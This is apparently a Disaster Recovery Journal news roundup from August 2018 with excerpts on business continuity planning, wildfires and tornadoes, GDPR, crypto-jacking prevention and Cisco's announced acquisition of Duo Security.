DRJ's Fall 2018

Conference & Exhibit

Attend The #1 BC/DR Event!

Summer Journal

Volume 31, Issue 2

Full Contents Now Available!

Industry Hot News

Industry Hot News (411)

It is a strange irony that the changes organizations make to remain competitive frequently open them up to risk in their DR/BCM program and recovery capability.

But when it comes to business continuity, the IT change management (CM) process at most organizations is integrated in name only.

Many organizations are ambitious about making changes that will drive the business forward and are careful regarding the implementation of those changes. But the need to keep the recovery plans and environment in sync with the production environment is frequently an afterthought.

In the event of a disruption, this can have impacts on the business ranging from inconvenient to calamitous.

In today’s post, we’ll discuss some of the main issues with CM from a business continuity perspective. We’ll also share some tips on what business continuity professionals can do to make sure that routine system and process changes do not leave the organization vulnerable to major impacts.



Network management can sometimes be a neglected afterthought, yet the availability and reliability of the network is essential for a whole host of mission-critical activities. Kevin Drinkall challenges organizations to consider whether they are giving enough attention to their network.

Technology expectations of businesses and employees are growing and changing every day. But the underlying network which enables us to use this tech properly, can’t always keep up. Instead of being the power behind it, networks can often prove inflexible when it comes to getting the most out of technology in the working environment.

This is a huge problem for businesses of all shapes and sizes, who need to adopt new technology to support its staff and processes, and for those wanting to embrace IoT and future innovations to stay ahead of the curve and attract a ‘tech-savvy’ workforce.

‘The whole is only as good as the sum of its parts’ has never been more appropriate in this scenario. With much excitement around the role of technology in the workplace; the connectivity, speed, security and indeed management of the supporting network to make it work is often an afterthought.



The Business Case for a Strong Culture of Ethics

Culture and ethics are all the rage in management theory and compliance discussions, but we never see them discussed as absolutely dependent on one another. If the ethics of the organization aren’t right, the culture will never be right. We explore this new way of thinking about this critical component of business strategy.

“If culture eats strategy for breakfast, ethics are the fork and knife.” – Snyderman Law Group

If you’ve been paying attention to any of the management theories that have been introduced within the past 10 years, you’ve no doubt been hit over the head with the notion that company culture drives an organization forward. Culture affects employee engagement and retention and can therefore boost profits. We now know that culture is a company’s personality and that it shows not only your employees, but also the rest of the world what kind of organization you really are.

Cultivating a company culture is no longer an option; it’s a necessary part of doing business. We are seeing more and more that a company’s culture is more important than salary for many employees. This epiphany came thanks to the millennials’ entrance into the workforce. Going to work every day to a place you love is not a new idea, but as Simon Sinek told us, millennials are the first ones to have the guts to expect it. We are now in the age of “whenever, wherever, whatever.” People no longer want to work a 9-to-5 job in an office for the rest of their career. They want to work whenever they want, wherever it’s convenient for them and for whatever length of time they decide.



Managing the challenge of data management, retention and availability is an ongoing issue for most organizations. In this article, Gordon Cullum explains where data virtualization can help; and where it won’t.

Data virtualization has often been heralded as the answer to enterprises caught in a vicious circle in a world riddled with data, both online and offline. However, it is important to remember that no technical solution is a silver bullet and data virtualization should not be thought of as a one stop solution for all an enterprise’s needs.

Businesses want to act and improve their decision-making in real time whilst containing costs and supporting business-as-usual activities, which can leave CIOs struggling to navigate through an array of complex applications and systems.

To get the most out of data virtualization, and when deployed with the right capabilities and methodology to achieve the desired result, businesses can leverage existing investment to solve current and future analytic needs without compromising on quality, budget and time.



(TNS) — The summer of seemingly endless rainfall took its toll again on the Berks County, Pa., region Monday, dumping several inches of precipitation that led to widespread flooding on areas already inundated in recent weeks.

And if the rain doesn't let up, meteorologists are predicting this August could prove to be the wettest ever recorded.

AccuWeather meteorologist Danielle Knittle said that 9.06 inches of rain has been recorded this month at Reading Regional Airport in Bern Township, the official site for Berks County rainfall totals.



Talk about your one-in-a-million situations. On June 13th, an EF-2 tornado struck the township of Wilkes-Barre, Pa. in the dark of night. For a city of approximately 40,000, this was an unusually powerful tornado, given how briefly it stayed on the ground. Once it struck, the tornado took a death-defying trip through the Wilkes-Barre Township business district, then ravaged the local mall before heading down a major thoroughfare, Interstate 81.

Tammac Holdings Corporation, a local financial services company that specializes in programs for the manufactured housing industry, sat directly in the path of this unusual twister. What’s more, it prides itself on its responsiveness to customer needs, so being in an exposed location was particularly dangerous.In the northeast, nighttime tornadoes are practically unheard of. In fact, since 1950, only 2.2 percent of the more than 850 tornadoes recorded in the Keystone State have occurred between 10 p.m. and midnight. Nighttime tornadoes are especially dangerous because you can’t see them coming, and they strike at a time when people are less focused on the weather.

Tammac Holdings Corporation, a local financial services company that specializes in programs for the manufactured housing industry, sat directly in the path of this unusual twister. What’s more, it prides itself on its responsiveness to customer needs, so being in an exposed location was particularly dangerous.



In 2017 Continuity Central published the results of a survey looking at whether the increasing focus on information security is having an effect on the traditional demarcation lines between business continuity and information security management (ISM). In 2018 we repeated that survey to monitor how things have developed and the results of the survey are now available.

Is information security a business continuity issue?

62 percent (64.5 percent in the 2017 survey) of respondents believe that information security is definitely a business continuity issue, with a further 29 percent (32 percent*) saying that it was partially a business continuity issue. 9 percent (3.5 percent*) said that information security is not a business continuity issue at all.

It seems clear from both the 2018 and the 2017 versions of the survey that information security is viewed as a business continuity issue; but to what extend do business continuity teams actually get involved in preventing and managing information security incidents? The remainder of the survey examined these areas:



(TNS) — Before the flames appeared, Sandie Freeman thought the sky above her Redding home looked especially beautiful.

The evening was golden hued and still; pretty enough that she took a picture. Minutes later, a light wind picked up and leaves from her oak tree began falling like rain, she said.

It was the only warning she received that something was amiss.



This spring, Bluelock Solutions from InterVision conducted a survey titled “2018 Legal Data Protection & Recovery,” focusing on the legal industry. The results found an overconfidence and mismatched expectations toward IT disaster recovery (IT-DR) within law firms. Here are a few responses that stuck out to us:



Airline outages are all too common – we’ve documented the many issues major U.S. airlines have faced on this timeline.

Airline Outages Cartoon

When IT fails and airline workers can’t check in passengers or issue tickets, out come the pencils, pens and paper.



Wednesday, 15 August 2018 15:27

Airline Outage? Pick up a Pencil

Over the course of an implementation, it’s inevitable that almost every customer asks us, “What’s the best way to do this?”  We always have an answer, but the real answer is highly dependent on your organization and its unique context as it relates to continuity. Each one of our customers are unique and have different needs based on their vertical market, size, structure, and program maturity, among other things.

Everyone’s gotten those (typically free) t-shirts and hats marked “one size fits all”.  The truth is, they seldom do. They’re either, too big, too small, or just not right. They might be close, but usually something is a little off. Similarly, there is no single “right” approach to building a business continuity program. It should be flexible and malleable, able to change and grow as your organization inevitably does.

Given the variation among our customers’ businesses, BC in the Cloud has worked to create plan templates that are specific enough to capture the heart of ISO and DRI standards, but generic enough to be able to be adapted to particular needs.



Wednesday, 15 August 2018 15:16

One Size Fits All

Campus communications for colleges and universities are necessary not only to keep day-to-day operation flowing, but also for the safety of your students and stakeholders.

This has become increasingly important as some campuses have become targets for violence rather than havens for students. With so many threats – from severe weather to active shooters – school officials must have a plan for communicating with their students, faculty, staff and stakeholders in a variety of critical situations.

Follow these tips to improving your campus communications as the new semester begins.



(TNS) - When Aledo and Joshua students head back to class, they’ll find police officers on their campus full time.

Weatherford students will know that some teachers and school employees likely are carrying concealed handguns.

And Fort Worth students will know police are monitoring school safety cameras in real time — and that school nurses are getting trained to treat victims of active shooters.

“We are consistently looking out for our kids,” said Susan Bohn, superintendent of Aledo schools, adding that teaching students in a safe environment is an everyday concern. “It’s never something that is out of our minds.”



(TNS) - With a “fire tornado” racing toward Redding neighborhoods on July 26, emergency officials in Shasta County started issuing mandatory evacuation orders.

They used reverse 911 calls, emergency announcements on TV and radio, opt-in text message systems and Amber alert-style cellphone warnings to get the word out.

And, as in Sonoma County in October, first responders went door to door, urging people to flee.

Three people perished, but thousands escaped as flames engulfed their neighborhoods, with authorities turning some two-way streets into one-way streets to facilitate traffic.

Credit lessons learned in October, when Sonoma County authorities, fearing panic, failed to use all of the tools at their disposal to warn residents about a ferocious wildfire that burned thousands of homes and took more than 20 lives.



GDPR essentially forces companies to go public with any cyber attack they suffer, which poses further challenges when it comes to protecting their reputation. However, a quick and effective response to a cyber attack is impossible without thorough planning and forethought. Jonathan Hemus offers some points to consider ...

The Global Data Protection Regulation (GDPR), which came into force in May this year, has fundamentally changed how organizations must respond to a cyber attack. The onus is on organizations to report any cyber attack to the authorities within 72 hours or face hefty fines.

GDPR essentially forces companies to go public with any cyber attack they suffer, which poses further challenges when it comes to protecting their reputation.

The short-term financial cost of a cyber attack can be significant but of equal concern is the damage it can do to an organization’s reputation and its stakeholders. For example, in November last year, the world’s largest shipping container line, AP Moller-Maersk, said the cost of the cyber-attack it suffered amounted to $300m, forcing it to cut its profit guidance and sending its share price down seven percent.

But for many organizations, cyber attacks can often tempt bosses to focus on the short-term financial impact at the expense of focusing on the longer-term reputational implications.



This is part 1 of a 3-part series on Digital Innovation Management. This blog series is intended to help a digital transformation team take a structured and measured approach to building enterprise scalable Digital Innovation Management capabilities.  

Digital transformation is leveraging new technologies that redefine the ways people live and work.  With economic benefits over the next decade estimated at $100 trillion, it is no surprise that half of all corporate boards have elevated digital to the CEO agenda.

An organization that has formulated its digital strategy needs to launch it by enabling key elements of the Digital Operating Model:

  • Digital Innovation Management
  • Digital Product Management
  • Digital Workforce Enablement



(TNS) - Fresno Police Department’s dispatchers answer every type of 911 call made within city limits — among other responsibilities.

They answer calls for medical aid, reports of fire, or when people report violent crimes like shootings and homicides. They take non-emergency calls, like when people call 911 looking for police detectives or to check a pending case.

They take the call when a suicidal person asks for an officer to arrive before their family finds their body. They answer the call when rape victims report the crime — sometimes as it’s happening.



Some people who hire business continuity consultants think of them as being like waiters: they expect the consultant to serve them at their leisure then quietly go away, allowing them to enjoy an excellent meal.

However, in my experience—I have been the CEO of a business continuity consulting and SaaS (software as a service) firm for 19 years—companies with this attitude do not get very much out of their consulting engagements, and their programs are the weaker for it.

The best business continuity managers and corporate leaders recognize that working with a BC consultant is, at its best, a lot like dancing the tango.



Duty of care—you might have heard the phrase tossed around by companies touting their dedication to their employees. You might just associate it with liability lawsuits and big payouts. But what exactly is it?

According to Collins Dictionary, duty of care is “the legal obligation to safeguard others from harm while they are in your care, using your services, or exposed to your activities.”

Its clear from this definition that duty of care applies to all kinds of organizations, from churches and Boy Scout groups, to hospitals and schools.



Friday, 10 August 2018 14:30


From coast to coast, severe weather is a problem for every community.

To better protect your constituents during storms and other forms of severe weather, consider ways you can get better prepared, including evaluating your communication methods.

Inclement Weather Alerting

Throughout the US, predominant weather patterns vary from region to region. From mudslides, earthquakes, and droughts to hurricanes, tornadoes, and floods—no region is untouched by severe weather. In order to best protect your community, focus on how to provide mass notification before, during, and after such natural disasters.

Long before severe weather becomes a real threat, your organization must already have plans in place and ready to be activated – especially when it comes to sending mass notifications. At the first indicator of inclement weather, you need to put your organization’s communication and response strategies into action. Be sure a reliable method for communication set up, tested, and fully prepared for such emergencies.



Has your organization ever been attacked by zombies? We don’t know any companies that have been, although we do know some that have used this as a scenario in their disaster recovery exercises.

In today’s post, we will discuss the pros and cons of using zombie attacks and similarly imaginative scenarios in your mock disaster exercises and also share some general tips on how to make the most of such exercises.

To begin, we will provide you with a quick refresher on the different types of DR exercises that businesses commonly conduct to assess and improve their capability to respond to emergencies.



An organization’s greatest asset is its employees, but the impact that new recruits have on a company’s success is sometimes less clear. Or is it? New international guidelines have just been published that give recruiters a metric to measure just how well they have done.

When it comes to recruitment, finding the right person for the job not only fills an employment gap, it can have a significant impact on the organization as a whole. Recognizing this, HR departments are now often strategic partners within a company, so measuring the impact of their expertise not only demonstrates their value, but allows for continuous improvement as well.

Measuring the “quality of hire”, or the benefit that newly employed staff bring to a company, is therefore essential to determine the effectiveness of the recruitment process.

Recently published, ISO technical specification ISO/TS 30411:2018, Human resource management – Quality of hire metric, outlines international best practice to do just that. It identifies metrics that can be used to evaluate the link between the new person’s work and the success of the organization.  



Steps to Improve Forensic Analytics

Thanks to advances in forensic analytics, we can spot emerging risks long before they come to fruition. But predictions frequently lead to false positives. Satish Lalchand discusses how to prevent them in this third installment of a series on the future of forensics, following articles on the application of data-driven analytics and how the uses and quality of data drive analytics insights.

Forensic analytics — the combination of advanced analytics, forensic accounting and investigative techniques — is making breakthroughs every day in identifying rare events of fraud, corruption and other schemes. To meet rising regulatory and customer demand for fraud mitigation, forensic analytics can reveal signals of emerging risks months — or sometimes even years — before they happen. Of course, predicting anomalous events can also create false positives.

In an effort to reduce false positives in fraud investigations, careful attention should be spent on steps including:



(TNS) - When a special legislative committee held its first public hearing in response to the North Bay wildfires two weeks ago in Sacramento, there were eight major wildfires burning across California.

When the 10-member bipartisan panel met again Tuesday, the number of conflagrations had doubled, and the marauding Mendocino Complex fires had scorched more than 292,000 acres in three counties or more than 450 square miles.

The hearing, however, was decidedly low key, as representatives from the state’s big three investor-owned utilities and two public power providers, including Healdsburg’s municipal utility, recited the steps they have taken and plan to take to mitigate future wildland blazes.



How to Prevent the Risk of Crypto-Jacking

New cryptomining malware uses an NSA-exploit to spread to Windows machines while disabling security software and opening the door to future attacks on infected computers. Now is the time for enterprise IT to fortify their defences. Chris Olson, CEO at The Media Trust, provides background on cryptomining and discusses best practices to prevent related incidents.

Cryptomining is the new jackpot for cybercriminals. As cryptocurrencies have grown in popularity and value, cryptocurrency mining has turned into a lucrative business. Around the globe, thousands of websites operated by some of the world’s most recognized companies and government agencies have been compromised by malicious actors anxious to harvest web visitors’ CPU power for their mining operations.

However, when it comes to cryptomining, the industry’s focus is on the attacks and compromised devices rather than the root cause. These attacks are but a symptom of a deeper problem within the digital ecosystem. Most enterprises do not have full visibility into the third-party code rendering on their websites and mobile apps. These third parties make ideal targets for malicious actors, who are continuously probing for ways to make money and secure greater returns on their efforts.



Wednesday, 08 August 2018 15:55

Cryptomining Malware On The Rise

(TNS) - It’s day 11 for Omar Estorga on the front lines of California’s firestorm.

Some nights, the captain and his crew have slept — sitting up — in the seats of their fire engine as the Carr fire raged. Other nights, they’ve stayed at the base camp in Shasta County. On their days off, they’ve snagged dorm rooms at Shasta College or, if they’re lucky, a hotel room when another fire crew has checked out.

As some 14,000 firefighters wrap up their second week battling more than a dozen destructive wildfires across the state, fatigue is setting but the fires show few signs of letting up.

To the south, the sprawling Mendocino Complex inferno on Monday became the largest fire ever recorded in California, burning more than 283,000 acres in just 11 days. The Ferguson fire has closed parts of Yosemite National Park indefinitely. Large swaths of the Sacramento Valley have been choked by smoke for days.



The UK consumer response to the General Data Protection Regulation (GDPR) is shifting. New research by SAS, ‘GDPR: The right to remain private’, reveals that more people are activating their new personal data rights, and faster, than expected. At the same time, the Facebook/Cambridge Analytica data scandal has made the majority of consumers either activate their rights, or at least reassess the information they share and how organizations use it.  

In 2017, SAS surveyed UK consumers for their views on the regulation, revealing that 42 percent planned to exercise their rights within a year of GDPR coming into force. However, the new research shows that 31 percent have already activated their rights over personal data, and 55 percent will have done so within a year.

GDPR came into effect in May, making organizations accountable for personal data protection and giving consumers significant new powers over their personal data. These new powers include the rights to access, query and erase the data held about them by organisations.



The threat of slavery or unethical behaviour in a firm’s supply chain is not receiving the attention it should, particularly by those who work in crisis management.

Firms are judged by the company they keep, and if they employ or work with partners who are guilty of such practises, this represents a massive potential hit to an organisation’s reputation. Crisis managers are currently so obsessed with all things cyber that this major risk is being left unattended.

Companies or partners that form part of a firm’s supply chain need to adhere to its own high ethical standards, but this can be hard to police.

Lead paint

A few years ago, I was brought in to help extricate a client from an ethical crisis. One of their premium brands is a very well-known set of children’s toys. These they had made in China, only to discover that the manufacturers had swapped out the agreed paint, brought in a cheaper brand, which contained high levels of lead and used this in the manufacturing process. Young children put toys in their mouth and quite often chew! Parents are pretty resistant to their little darlings sucking on lead.

The company had agreed with the Chinese makers which lead-free paint should be used and even installed detectors in the factory that checked for lead contamination. These were left to gather dust. The brand went on to feature in the New York Times for all the wrong reasons.



Tuesday, 07 August 2018 14:27

Slavery in the supply chain

(TNS) - A tornado packing 110 mph winds hit Webster with “no warning at all,” tearing up Main Street, cutting off power and displacing 25 — with one driver injured by flying debris.

It swept into town as a line of powerful storms rolled through the state yesterday leaving flash flooding and broken tree limbs in its wake before heading out to sea.

“It’s horrible,” said Ann Lavallee, 25, of Webster. “It hit Main Street. It blew out the windows of some buildings. Some businesses were destroyed. There are fallen tree limbs ... flooding.



Monday, 06 August 2018 14:34

Tornado Rips through Webster, Mass.

(TNS) - Patience is wearing thin in Greenbrier County, W. Va., where some people continue to live in marginally habitable structures more than 25 months after the deadly flood that claimed nearly two dozen lives and caused millions of dollars of property damage across West Virginia.

Meanwhile, the state’s RISE program is in possession of nearly $150 million in HUD funding intended to assist low-income flood victims with their housing needs.

To date, the amount spent on home placement, construction and rehabilitation totals $784,407.75, according to the man who earlier this summer took charge of the RISE program, Maj. Gen. James Hoyer, adjutant general of the West Virginia National Guard. An additional $583,000 has been obligated for payment of outstanding invoices, he added.



(TNS) - Even as fires rage across California, thousands of new homes are being built deeper into our flammable foothills and forests, as lethal as they are lovely.

A recent surge in subdivisions in high-risk wildlands is putting more of us in harm’s way, say experts. For millennia, wildfires just burned trees; now they’re claiming homes, with heirlooms, pools, family photos, pets, cars and precious lives.

“It’s the ‘expanding bull’s eye’ effect,” said geographer Stephen M. Strader of Villanova University, who tracks population growth in high-risk areas. “Cities are moving into regions where there were no people before. People and wildfires are coming together more often.”



Daniel Perrin, Global Solutions Director, Workplace Recovery, IWG

With hurricanes and other natural disasters impacting the U.S., now, more than ever, companies are re-examining their business continuity plans. Traditional workplace recovery strategies haven’t kept pace with modern business needs though. Historically, companies built their strategy around IT. This meant that when disaster stuck, to keep critical staff working, businesses needed access to their data.

The solution was to keep offices near a recovery server ready for when a problem shut the office down. If that happened, businesses would send the 20 or so needed staff to work from space next to the server. That’s the model the industry has followed, but it is a model which is redundant.

Why? There are three main reasons:
  1. Technology has evolved dramatically since most large businesses first developed a workplace recovery strategy. The rise in cloud computing means that data is not housed in one particular place. It can be accessed from anywhere. This means a recovery plan no longer needs to be based entirely on the location of servers. It can be based on what works best for your business at a particular time.
  2. Recovering to one fixed location can be a logistical nightmare – if not ill-advised. Of course, if a small leak in an office has rendered it unusable, you can move staff to a specific, identified back-up office. But, what if your city is flooded or facing another equally significant impact event? Chances are one of two things will occur, if you are dependent for recovery on one specific location. Either your back-up location will also be hit or your people won’t be able to get there. In today’s world, a smart business needs to develop a workplace recovery strategy that is responsive and dynamic. One which can evolve to a live situation.
  3. The traditional financial model of making workplace recovery centers profitable revolves around oversubscribing each one – essentially selling the same “seat” to 10 or so different businesses. This makes sense based on the assumption that different businesses will not need recovery at the same time. But, in the example above – a major incident affecting large swathes of a city – chances are multiple companies will be impacted. Businesses therefore run the risk that at the one time they need the recovery seat they’ve been paying for, someone else may be sitting in it.


What makes a dynamic workplace recovery provider?

Primarily, one that offers a network of locations to choose from and offers flexibility to meet customers’ needs. And, a provider that will guarantee you space in any type of emergency, especially ones that impact entire cities.

For example, when Hurricane Harvey hit Texas in 2017, Regus, which provides flexible workspace and is owned by IWG, offered the capacity to ensure that customers could continue working because it had 70 locations in the area. For example, one of our customers wanted to recover to one of our offices in the Woodlands, outside of Houston. This seemed sensible, but as the storm approached it became clear that this client’s employees would not be able to reach the site. We were able, proactively, to contact the customer and adapt their plan in real time, by the minute, recovering them to another location that would not be affected.

Businesses are realizing that workplace recovery plans are critical and that their current plans may not be fit for purpose. It’s a good time for companies to evaluate their plans and ensure that they are working with dynamic partners that have the flexibility to meet their needs.

For more information, visit http://www.iwgplc.com/.

The Need for a Chief Privacy Officer

Nearly every day we hear about another data breach at a major corporation, making the case for a chief privacy officer (CPO) more compelling now than ever. Adams and Reese attorney Roy Hadley discusses the various reasons organizations should employ a CPO.

2.5 quintillion bytes of data — that’s the amount of data estimated by some to be created every day.

Yes, that is 2,500,000,000,000,000,000. Every day.

To put that number into perspective, the length of 1,000,000,000,000 (one trillion), $1 bills laid end to end measures approximately 96,906,656 miles. This would exceed the distance from the earth to the sun. A quintillion is equal to one million trillions. That is a long line of dollar bills!

While a mind-boggling number, it is estimated that due to the internet of things, this amount of data created will continue to grow. It is amazing how this data is created. According to Forbes.com, more than 3.7 billion humans use the internet every day. On average, Google processes more than 40,000 searches every second, which translates to 3.5 billion searches each day. Further, every minute of the day, Snapchat users share more than 500,000 photos.

In short, the amount of data we are creating is hard to fathom.



Friday, 03 August 2018 16:56

Data Here, Data There, Data Everywhere

This article by Clinton Jayne looks at individual organizations around the world and what their supply chain may have to endure during this period of geopolitical instability, where trade arrangements seem to change daily and the long term impact of potential arrangements such as Brexit are largely unknown and not transparent.

I am not an economist and make no attempt to look at national economies and their individual circumstances. I also do not consider myself a politician (a fact I am immensely happy about) and do not look at political imperatives that drive the trade uncertainties. The point of this article is to look at individual supply chain circumstances and what organizations may need to do to ensure their survival and longevity.

Those expressing concerns

So, having explained the context let’s consider some of the known outcomes (taken from news broadcasts) thus far.

Airbus recently completed a study of their UK circumstances and the possible impact of Brexit and the customs union. The factory (employing 14,000 people) that produces wings and relies on the supply of aluminum and other products, not all of which are produced in Britain. I have no idea what their detailed findings are but their warning to the politicians indicate that the impact could be very significant.



Congress this week temporarily extended the National Flood Insurance Program (NFIP) until November, avoiding a lapse of the program but also avoiding any needed reforms.

Up until Hurricane Katrina in 2005, the program was self-sustaining, for the most part, sometimes taking short-term loans to keep up. But Last year, the debt reached almost $25 billion, of which $16 billion was forgiven by Congress last November. The debt is now $20.5 billion.

Critics believe the program, in its current form, is unsustainable and needs reforming. Otherwise, another season like last season, with hurricanes Harvey, Irma and Maria, could require forgiving more debt.



King Neptune gets power from his three-pronged trident, and those of us who work in business continuity can gain power from what I call the BCM Trident. That is, the three key performance indicators (KPIs) that can help you understand and improve your business continuity program.

These 3 KPIs are soundness, risk, and value.

In today’s post, I’ll talk about each one and explain how you can leverage them to sharpen your BCM program.



The year 2018 continues to see big changes in the practice of IT/Disaster Recovery, but the core concepts for achieving an effective solution for IT and disaster recovery in 2018 remain the same as ever.

In today’s blog, we’ll take a helicopter tour of what has and hasn’t changed in IT/DR recently, then look at how you can determine what approach is best for your organization.

Cloudy Weather

The big trend in disaster recovery is the continued growth in the use of DR in the cloud, where organizations store their data and servers to a cloud computing environment and recover and process from there in the event of a disruption. Organizations use cloud-based infrastructure to recover virtual servers (and potentially physical servers via a physical to virtual migration process).

Also associated with cloud-based recovery, organizations use DR as a service where a third-party vendor keeps the company data and cloud environment in sync. When there’s a need, the service provider spins the replicated data up from the cloud.



A Bribe is a Bribe

Why do organizations use sanitized language rather than more direct verbiage? A new generation of business leaders and employees is beginning to question the need for corporate speak. Michael Volkov discusses the need for a new approach.

Language communicates more than just words – indeed, the use of language reflects much more than simple communication. Often, a person’s language reveals an attitude, a feeling, a perspective and much more. I am often struck by how language is used by corporations to mask a clear and distinct idea. Corporate speak is a language unto itself; it can reflect a company’s culture and its commitment to honesty, trust and integrity.

Forgive me for questioning the use of corporate language, but when I read phrases such as “improper payments,” “questionable payments” and other equally vague terms used to describe flat-out bribes, I question the need for companies to avoid using accurate language. My overriding question in these circumstances is, why can’t the company use straightforward language?

A bribe is a bribe, and no matter how you characterize the payment, it is still a bribe. Of course, I recognize that in order to violate the FCPA or domestic bribery laws, a payment must be made with “corrupt” intent. In the FCPA context, a payment must be made with intent to influence a foreign official to act contrary to his or her official duties. Assuming that a payment is made with the requisite intent, such a payment constitutes a bribe.



Thursday, 02 August 2018 14:34

Corporate Doublespeak

(TNS) - When the radio of a Bakersfield police officer breaks, the IT department doesn’t call the manufacturer for a replacement. They go to eBay to try to find extra parts.

The 20-year-old public safety radio system for both Bakersfield and Kern County is outdated. The manufacturer of the radios no longer services the devices nor produces parts for upgrades.

Agencies like the Bakersfield Police Department and the Kern County Sheriff's Office use their radio systems for officers and the dispatch centers to communicate with each other.

The city and county have begun formulating a strategy for updating the aging analog system to digital.



If your organization has a heavy focus on analytics as part of the digital wave affecting oil and gas companies today, you’re very likely to start hearing the Agile Scrum framework seeping its way into conversations; however, not every team can or should leverage Scrum, depending on their team structure and needs.  If your team wants to benefit from Agile principles without utilizing Scrum to do so, there is a path forward.

One good example of a team that may not benefit from defined, time-boxed sprint-cycles are data scientists.  In many cases, the business will reach out directly to these key resources who will subsequently build a model using their own methodology, store data and R/Python code on their laptops, and remain skeptical about collaborating effectively with others.  As a manager, this can be a frustrating prospect, since visibility around resource management and project progress can be limited.  By leveraging some best practices from Agile principles/values (rather than implementing full Scrum), analytics managers can determine where in a project a team member is, what work is being performed over what timeline for resource management, and where code will live, in case someone loses a laptop or wins the lottery.



Thursday, 02 August 2018 14:22


Acquisition Will Help Accelerate Cisco’s Intent-Based Networking Strategy, Allowing Customers to Securely Connect Users to Any Application on Any Network


SAN JOSE, Calif. – In a release issued earlier today by Cisco (NASDAQ:CSCO), the company is updating a link in the release.

Cisco Announces Intent to Acquire Duo Security
 From left to right: Duo Security co-founder and CEO Dug Song; Cisco security business SVP Gee Rittenhouse; and Duo Security co-founder and CTO Jon Oberheide.

Cisco (NASDAQ:CSCO) today announced its intent to acquire privately-held Duo Security, headquartered in Ann Arbor, Mich. Duo Security is the leading provider of unified access security and multi-factor authentication delivered through the cloud. Duo Security’s solution verifies the identity of users and the health of their devices before granting them access to applications – helping prevent cybersecurity breaches. Integration of Cisco’s network, device and cloud security platforms with Duo Security’s zero-trust authentication and access products will enable Cisco customers to easily and securely connect users to any application on any networked device.

Under the terms of the agreement, Cisco will pay $2.35 billion in cash and assumed equity awards for Duo Security’s outstanding shares, warrants and equity incentives on a fully-diluted basis.

“In today’s multicloud world, the modern workforce is connecting to critical business applications both on- and off-premise,” said David Goeckeler, executive vice president and general manager of Cisco’s networking and security business. “IT teams are responsible for protecting hundreds of different perimeters that span anywhere a user makes an access decision. Duo’s zero-trust authentication and access products integrated with our network, device and cloud security platforms will enable our customers to address the complexity and challenges that stem from multi-and hybrid-cloud environments.”

Business-critical data and applications today are accessed by customers, partners and employees from a multitude of locations and networks, both secure and open, using company-issued and personal devices. Attackers know that one of the most effective ways to access enterprise systems is through compromising user passwords or devices. According to the 2017 Verizon Data Breach Report, the majority of hacking related breaches involve stolen or weak passwords. Acknowledging this, Cisco and Duo Security are closely aligned in the approach of designing infrastructure for the extended enterprise where users, devices and applications are the center of the modern security architecture.

The acquisition of Duo Security will:

  • Extend intent-based networking into multicloud environments. Cisco currently provides on-premises network access control via its Identity Services Engine (ISE) product. Duo’s software as a service-based (SaaS) model will be integrated with Cisco ISE to extend ISE to provide cloud-delivered application access control.
  • Simplify policy for cloud security. By verifying user and device trust, Duo will add trusted identity awareness into Cisco’s Secure Internet Gateway, Cloud Access Security Broker, Enterprise Mobility Management, and several other cloud-delivered products.
  • Expands endpoint visibility coverage. Cisco’s in-depth visibility of over 180 million managed devices will be augmented by Duo’s broad visibility of mobile and unmanaged devices.

“Our partnership is the product of the rapid evolution of the IT landscape alongside a modernizing workforce, which has completely changed how organizations must think about security,” said Dug Song, Duo Security’s co-founder and chief executive officer. “Cisco created the modern IT infrastructure, and together we will rapidly accelerate our mission of securing access for all users, with any device, connecting to any application, on any network. By joining forces with the world’s largest networking and enterprise security company, we have a unique opportunity to drive change at a massive scale, and reshape the industry.”

The acquisition is expected to close during the first quarter of Cisco’s fiscal year 2019, subject to customary closing conditions and required regulatory approvals. Duo Security, which will continue to be led by Song, will join Cisco’s Networking and Security business led by EVP and GM David Goeckeler.

For more information about Cisco’s intent to acquire Duo Security, read the following blogs from:

Investor and Media Call

Cisco will host a joint investor, media and industry analyst call on Thursday, August 2, at 6:00 a.m. PDT/9:00 a.m. EDT to discuss the proposed transaction. The call will feature Rob Salvagno, vice president of corporate development at Cisco; David Goeckeler, executive vice president and general manager of Cisco’s networking and security business; and Duo Security CEO Dug Song. To join the webcast, visit https://investor.cisco.com. Toll-free dial-in number is 800-779-1185; or 1-312-470-7366; Passcode: 3862813.Conference call replay will be available approximately one hour after the conclusion of the event through Friday August 10, toll-free at 800-925-0258 or 203-369-3861 (no passcode required). The replay will be available on the Cisco Investor Relations website at http://investor.cisco.com, no password required.

About Cisco

Cisco (NASDAQ:CSCO) is the worldwide technology leader that has been making the Internet work since 1984. Our people, products, and partners help society securely connect and seize tomorrow's digital opportunity today. Discover more at newsroom.cisco.com and follow us on Twitter at @Cisco.

RSS Feed for Cisco: http://newsroom.cisco.com/rss-feeds

Cisco and the Cisco logo are trademarks or registered trademarks of Cisco and/or its affiliates in the U.S. and other countries. To view a list of Cisco trademarks, go to: www.cisco.com/go/trademarks. Third-party trademarks mentioned in this document are the property of their respective owners. The use of the word partner does not imply a partnership relationship between Cisco and any other company.  

About Duo Security

Duo Security helps defend organizations against data breaches by making security easy and effective. Duo Beyond, the company's category defining zero-trust security platform, enables organizations to provide trusted access to all of their critical applications, for any user, from anywhere, and with any device. The company is a trusted partner to more than 12,000 customers globally, including Dresser-Rand, Etsy, Facebook, K-Swiss, Random House, Yelp, Zillow, Paramount Pictures, and more. Founded in Michigan, Duo has offices in Ann Arbor and Detroit, as well as growing hubs in Austin, Texas; San Mateo, California; and London, UK. Visit Duo.com to find out more.

Forward-Looking Statements
This press release may be deemed to contain forward-looking statements, which are subject to the safe harbor provisions of the Private Securities Litigation Reform Act of 1995, including statements regarding the acquisition enabling Cisco customers to securely connect users to any application on any networked device, Duo's unified access security and multi-factor authentication helping Cisco accelerate priority areas across its networking and security portfolio, the expected benefits to Cisco and its customers from completing the acquisition, and plans regarding Duo personnel. Readers are cautioned that these forward-looking statements are only predictions and may differ materially from actual future events or results due a variety of factors, including, among other things, that conditions to the closing of the transaction may not be satisfied, the potential impact on the business of Duo due to the uncertainty about the acquisition, the retention of employees of Duo and the ability of Cisco to successfully integrate Duo and to achieve expected benefits, business and economic conditions and growth trends in the networking industry, customer markets and various geographic regions, global economic conditions and uncertainties in the geopolitical environment and other risk factors set forth in Cisco's most recent reports on Form 10-K and Form 10-Q. Any forward-looking statements in this release are based on limited information currently available to Cisco, which is subject to change, and Cisco will not necessarily update the information.

For more than three decades, millions of Americans across thousands of communities have gathered together on the first Tuesday in August to celebrate National Night Out, an event promoting police-community partnerships and fostering neighborhood connections.

